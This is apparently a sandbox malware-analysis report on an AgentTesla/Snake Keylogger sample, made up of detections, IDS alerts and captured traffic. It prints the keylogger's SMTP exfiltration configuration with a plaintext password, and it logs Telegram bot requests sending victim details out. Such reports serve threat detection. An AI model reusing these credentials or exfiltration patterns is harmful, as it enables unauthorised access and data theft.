2024-10-22T15:42:24.907916+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49721	132.226.247.73	80	TCP
2024-10-22T15:42:25.923518+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49721	132.226.247.73	80	TCP
2024-10-22T15:42:27.720395+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49742	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Avira: detection malicious, Label: TR/AD.SnakeStealer.udtvt

Found malware configuration

Source: 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sender@inhousepick.com", "Password": "#(P%eO^#J0", "Host": "smtp.inhousepick.com", "Port": "587", "Version": "4.4"}
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sender@inhousepick.com", "Password": "#(P%eO^#J0", "Host": "smtp.inhousepick.com", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49830 version: TLS 1.2

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 4x nop then jmp 00E1F45Dh	9_2_00E1F2C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 4x nop then jmp 00E1F45Dh	9_2_00E1F4AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 4x nop then jmp 00E1FC19h	9_2_00E1F974
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 00F9F45Dh	15_2_00F9F2D3
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 00F9F45Dh	15_2_00F9F4AC
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 00F9FC19h	15_2_00F9F960
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0525E959h	15_2_0525E6B0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0525D7F9h	15_2_0525D550
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 052531E0h	15_2_05252DB8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 052531E0h	15_2_05252DC8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0525CF49h	15_2_0525CCA0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0525F209h	15_2_0525EF60
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0525E0A9h	15_2_0525DE00
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_05250673
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 052531E0h	15_2_0525310E
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05252C19h	15_2_05252968
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0525DC51h	15_2_0525D9A8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0525FAB9h	15_2_0525F810
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_05250040
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_05250853
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0525D3A1h	15_2_0525D0F8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05250D0Dh	15_2_05250B30
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05251697h	15_2_05250B30
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0525EDB1h	15_2_0525EB08
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0525F661h	15_2_0525F3B8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0525E501h	15_2_0525E258
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593ECA6h	15_2_0593E9D8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05939280h	15_2_05938FB0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05937EB5h	15_2_05937B78
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05931449h	15_2_059311A0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then mov esp, ebp	15_2_0593B1C0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 059318A1h	15_2_059315F8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593CCB6h	15_2_0593C9E8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593C826h	15_2_0593C558
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05930FF1h	15_2_05930D48
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593E816h	15_2_0593E548
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05930741h	15_2_05930498
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then mov esp, ebp	15_2_0593B081
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05936733h	15_2_05936488
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593E386h	15_2_0593E0B8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593C396h	15_2_0593C0C8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05930B99h	15_2_059308F0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 059332B1h	15_2_05933008
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 059362D9h	15_2_05936030
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593BF06h	15_2_0593BC38
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593DEF6h	15_2_0593DC28
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 059302E9h	15_2_05930040
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05933709h	15_2_05933460
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593DA66h	15_2_0593D798
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05935A29h	15_2_05935780
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593FA56h	15_2_0593F788
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05932E59h	15_2_05932BB0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593BA76h	15_2_0593B7A8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05935E81h	15_2_05935BD8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593B5E6h	15_2_0593B318
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 059325A9h	15_2_05932300
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593D5D6h	15_2_0593D308
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 059379C9h	15_2_05937720
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 059355D1h	15_2_05935328
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05932A01h	15_2_05932758
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05932151h	15_2_05931EA8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05935179h	15_2_05934ED0
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05937571h	15_2_059372C8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593F5C6h	15_2_0593F2F8
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05936CC1h	15_2_05936A18
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 059348C9h	15_2_05934620
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05931CF9h	15_2_05931A50
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05937119h	15_2_05936E70
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 05934D21h	15_2_05934A78
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593D146h	15_2_0593CE78
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 4x nop then jmp 0593F136h	15_2_0593EE68

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.6:49847 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2023/10/2024%20/%2002:42:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2023/10/2024%20/%2002:32:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 208.91.199.223 208.91.199.223

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49718 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49721 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49742 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49712 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49716 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49784 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49760 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49768 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49722 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49799 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49798 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49825 -> 188.114.96.3:443

Source: global traffic

TCP traffic: 192.168.2.6:49847 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2023/10/2024%20/%2002:42:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2023/10/2024%20/%2002:32:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
